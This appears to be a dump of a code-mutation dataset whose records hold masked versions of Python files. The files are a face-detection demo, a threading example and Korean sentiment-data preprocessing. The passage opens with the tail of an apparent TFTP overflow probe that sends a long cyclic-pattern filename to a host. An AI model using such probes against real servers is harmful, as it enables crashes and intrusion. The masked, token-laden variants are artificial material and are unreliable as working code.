y9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk\"\nmode = \"netascii\"\nbuf = \"\\x00\\x02\" + filename+ \"\\0\" + mode+ \"\\0\" \ns.sendto(buf, (host, port))", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> sys.path.extend(['detection', 'train']) <|reserved_special_token_0|> if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) <|reserved_special_token_0|> if config.input_mode == '1': path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2 - t1) / cv2.getTickFrequency() fps = 1.0 / t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int( bbox[3])] cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[ 2], corpbbox[3]), (255, 0, 0), 1) cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format( fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2 ) for i in range(landmarks.shape[0]): for j in range(len(landmarks[i]) // 2): cv2.circle(frame, (int(landmarks[i][2 * j]), int(int( landmarks[i][2 * j + 1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow('result', frame) if cv2.waitKey(1) & 255 == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows() <|reserved_special_token_1|> <|reserved_special_token_0|> sys.path.extend(['detection', 'train']) <|reserved_special_token_0|> test_mode = 'ONet' thresh = [0.6, 0.7, 0.9] min_face_size = 24 stride = 2 detectors = [None, None, None] scale_factor = 0.79 model_path = ['model/PNet/', 'model/RNet/', 'model/ONet'] batch_size = config.batches detectors[0] = FcnDetector(P_Net, model_path[0]) if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) mtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size= min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor) out_path = join('validate', test_mode) + '/' if config.input_mode == '1': path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2 - t1) / cv2.getTickFrequency() fps = 1.0 / t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int( bbox[3])] cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[ 2], corpbbox[3]), (255, 0, 0), 1) cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format( fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2 ) for i in range(landmarks.shape[0]): for j in range(len(landmarks[i]) // 2): cv2.circle(frame, (int(landmarks[i][2 * j]), int(int( landmarks[i][2 * j + 1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow('result', frame) if cv2.waitKey(1) & 255 == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows() <|reserved_special_token_1|> import sys sys.path.extend(['detection', 'train']) from MtcnnDetector import MtcnnDetector from detector import Detector from fcn_detector import FcnDetector from model_factory import P_Net, R_Net, O_Net import config as config from preprocess.utils import iou import cv2 import os from os.path import join, split import numpy as np from tqdm import tqdm test_mode = 'ONet' thresh = [0.6, 0.7, 0.9] min_face_size = 24 stride = 2 detectors = [None, None, None] scale_factor = 0.79 model_path = ['model/PNet/', 'model/RNet/', 'model/ONet'] batch_size = config.batches detectors[0] = FcnDetector(P_Net, model_path[0]) if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) mtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size= min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor) out_path = join('validate', test_mode) + '/' if config.input_mode == '1': path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2 - t1) / cv2.getTickFrequency() fps = 1.0 / t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int( bbox[3])] cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[ 2], corpbbox[3]), (255, 0, 0), 1) cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format( fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2 ) for i in range(landmarks.shape[0]): for j in range(len(landmarks[i]) // 2): cv2.circle(frame, (int(landmarks[i][2 * j]), int(int( landmarks[i][2 * j + 1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow('result', frame) if cv2.waitKey(1) & 255 == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows() <|reserved_special_token_1|> # coding: utf-8 # In[1]: import sys sys.path.extend(['detection', 'train']) # from detection folder from MtcnnDetector import MtcnnDetector from detector import Detector from fcn_detector import FcnDetector # from train folder from model_factory import P_Net, R_Net, O_Net import config as config from preprocess.utils import iou import cv2 import os from os.path import join, split import numpy as np from tqdm import tqdm # In[ ]: # test_mode = config.test_mode test_mode = 'ONet' thresh = [0.6, 0.7, 0.9] min_face_size = 24 stride = 2 detectors = [None, None, None] scale_factor = 0.79 # 模型放置位置 model_path = ['model/PNet/', 'model/RNet/', 'model/ONet'] batch_size = config.batches detectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) # Use the three detectors to construct a mtcnn_detector = MtcnnDetector( detectors=detectors, min_face_size=min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor) out_path = join('validate', test_mode) + '/' if config.input_mode == '1': #选用图片 path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2-t1)/cv2.getTickFrequency() fps = 1.0/t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3])] #画人脸框 cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[2], corpbbox[3]), (255, 0, 0), 1) #画置信度 cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) #画fps值 cv2.putText(frame, '{:.4f}'.format(t) + " " + '{:.3f}'.format(fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2) #画关键点 for i in range(landmarks.shape[0]): for j in range(len(landmarks[i])//2): cv2.circle( frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow("result", frame) if cv2.waitKey(1) & 0xFF == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows()
flexible
{ "blob_id": "f97a892e6e0aa258ad917c4a73a66e89b0dc3253", "index": 267, "step-1": "<mask token>\n", "step-2": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n<mask token>\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-3": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-4": "import sys\nsys.path.extend(['detection', 'train'])\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-5": "\n# coding: utf-8\n\n# In[1]:\nimport sys\nsys.path.extend(['detection', 'train'])\n\n# from detection folder\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\n\n# from train folder\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\n\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\n\n# In[ ]:\n# test_mode = config.test_mode\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\n\nscale_factor = 0.79\n\n# 模型放置位置\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\n\ndetectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n\n# Use the three detectors to construct a \nmtcnn_detector = MtcnnDetector(\n detectors=detectors,\n min_face_size=min_face_size,\n stride=stride,\n threshold=thresh,\n scale_factor=scale_factor)\n\n\nout_path = join('validate', test_mode) + '/'\n\nif config.input_mode == '1':\n #选用图片\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n\n cv2.imwrite(out_path + item, img_labeled)\n\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2-t1)/cv2.getTickFrequency()\n fps = 1.0/t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]),\n int(bbox[2]), int(bbox[3])]\n\n #画人脸框\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]),\n (corpbbox[2], corpbbox[3]), (255, 0, 0), 1)\n #画置信度\n cv2.putText(frame, '{:.2f}'.format(score),\n (corpbbox[0], corpbbox[1] - 2),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 0, 255), 2)\n #画fps值\n cv2.putText(frame, '{:.4f}'.format(t) + \" \" + '{:.3f}'.format(fps), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2)\n #画关键点\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i])//2):\n cv2.circle(\n frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow(\"result\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
__author__ = 'dongdaqing' import threading,time class MyThread(threading.Thread): def __init__(self, name=None): threading.Thread.__init__(self) self.name = name def run(self): print time.strftime('%Y-%m-%d %H-%M-%S',time.localtime()) print self.name def test(): for i in range(0, 100): t = MyThread("thread_" + str(i)) t.start() if __name__=='__main__': test()
normal
{ "blob_id": "9c277030ef384d60e62c2c48e38a1271a43826d6", "index": 3557, "step-1": "__author__ = 'dongdaqing'\n\nimport threading,time\nclass MyThread(threading.Thread):\n def __init__(self, name=None):\n threading.Thread.__init__(self)\n self.name = name\n\n def run(self):\n print time.strftime('%Y-%m-%d %H-%M-%S',time.localtime())\n print self.name\n\ndef test():\n for i in range(0, 100):\n t = MyThread(\"thread_\" + str(i))\n t.start()\n\nif __name__=='__main__':\n test()", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
"""Файл, который запускается при python qtester """
normal
{ "blob_id": "90fc6590dab51141124ca73082b8d937008ae782", "index": 7400, "step-1": "<mask token>\n", "step-2": "\"\"\"Файл, который запускается при python qtester\n\"\"\"", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
import os import os.path import numpy as np import pickle import codecs from konlpy.tag import Okt from hyperparams import params from gensim.models import FastText #tokenizer tokenizer = Okt() def make_word_dictionary(word_dict_pkl_path=params['default_word_dict_pkl_path'], training_data_path = params['default_training_data_path']): #word_dict => 'Word':'index' word_dict = dict() if os.path.isfile(word_dict_pkl_path): #if already existed, just load it with open(word_dict_pkl_path, 'rb') as f: word_dict = pickle.load(f) print('Existed word_dict loaded') else: print('No word_dict pkl file, start making word_dict...') with codecs.open(training_data_path, 'r', encoding='utf-8') as f: word_vocab = dict() # 'word':'frequency' for line in f.read().split('\n')[1:]: review = line.split('\t')[1] #tokenizing tokens = tokenizer.morphs(review) for token in tokens: if token in word_vocab.keys(): word_vocab[token] += 1 else: word_vocab[token] = 1 word_vocab = [word for word in word_vocab.keys() if word_vocab[word] >= params['min_vocab_count']] # add pad & unk token word_vocab = [params['PAD']] + word_vocab + [params['UNK']] for idx, word in enumerate(word_vocab): word_dict[word] = idx print('Making word_dict ... Done and Saved') with open(word_dict_pkl_path, 'wb') as f: pickle.dump(word_dict, f) return word_dict def make_word_embedding(word_dict, word_emb_pkl_path = params['default_word_emb_pkl_path'], fasttext_path = params['default_fasttext_path']): word_emb = np.zeros([len(word_dict), params['word_emb_dim']]) if os.path.isfile(word_emb_pkl_path): with open(word_emb_pkl_path, 'rb') as f: word_emb = pickle.load(f) print('Existed trained word embedding loaded') else: #load fasttext model fasttext_model = FastText.load_fasttext_format(fasttext_path, encoding='utf8') print('No word_emb pkl file, start making word_emb ...') for word, idx in word_dict.items(): if idx==0: # PAD = 0 continue else: try: word_emb[idx] = np.asarray(fasttext_model.wv[word]) except KeyError: # if there is no word vector for certain word, just assign random vector word_emb[idx] = np.random.uniform(-0.25, 0.25, params['word_emb_dim']) with open(word_emb_pkl_path, 'wb') as f: pickle.dump(word_emb, f) print('Making word_emb ... Done and Saved') return word_emb def zero_padding(token_sentence, word_dict): #input : [1,4,3,2,1,15] #output : [1,4,3,2,1,15,0,0,0,0] padded_sentence = token_sentence + [word_dict[params['PAD']]]*(params['max_seq_length']-len(token_sentence)) return padded_sentence def dataset_iterator(filename, word_dict, batch_size): #yield batch for training with open(filename, 'r', encoding='utf8') as f_dataset: context = [] sequence_length = [] label = [] text = f_dataset.read().split('\n') for line in text[1:]: class_label = [0,0] review = line.split('\t')[1] polarity = int(line.split('\t')[2]) class_label[polarity] = 1 #mark polarity label.append(class_label) tokens = tokenizer.morphs(review) #if the review is too long, cut it to adequate length if len(tokens) > params['max_seq_length']: tokens = tokens[:params['max_seq_length']] sentence = [word_dict[word] if word in word_dict else word_dict[params['UNK']] for word in tokens] sequence_length.append(len(sentence)) sentence = zero_padding(sentence, word_dict) context.append(sentence) if len(context) == batch_size: yield (context, sequence_length, label) context =[] sequence_length = [] label = [] if len(context) > 0: yield (context, sequence_length, label)
normal
{ "blob_id": "430e971d2ae41bfd60e7416ecb2c26bb08e4df45", "index": 6520, "step-1": "<mask token>\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\n<mask token>\n\n\ndef zero_padding(token_sentence, word_dict):\n padded_sentence = token_sentence + [word_dict[params['PAD']]] * (params\n ['max_seq_length'] - len(token_sentence))\n return padded_sentence\n\n\ndef dataset_iterator(filename, word_dict, batch_size):\n with open(filename, 'r', encoding='utf8') as f_dataset:\n context = []\n sequence_length = []\n label = []\n text = f_dataset.read().split('\\n')\n for line in text[1:]:\n class_label = [0, 0]\n review = line.split('\\t')[1]\n polarity = int(line.split('\\t')[2])\n class_label[polarity] = 1\n label.append(class_label)\n tokens = tokenizer.morphs(review)\n if len(tokens) > params['max_seq_length']:\n tokens = tokens[:params['max_seq_length']]\n sentence = [(word_dict[word] if word in word_dict else\n word_dict[params['UNK']]) for word in tokens]\n sequence_length.append(len(sentence))\n sentence = zero_padding(sentence, word_dict)\n context.append(sentence)\n if len(context) == batch_size:\n yield context, sequence_length, label\n context = []\n sequence_length = []\n label = []\n if len(context) > 0:\n yield context, sequence_length, label\n", "step-3": "<mask token>\ntokenizer = Okt()\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\ndef make_word_embedding(word_dict, word_emb_pkl_path=params[\n 'default_word_emb_pkl_path'], fasttext_path=params['default_fasttext_path']\n ):\n word_emb 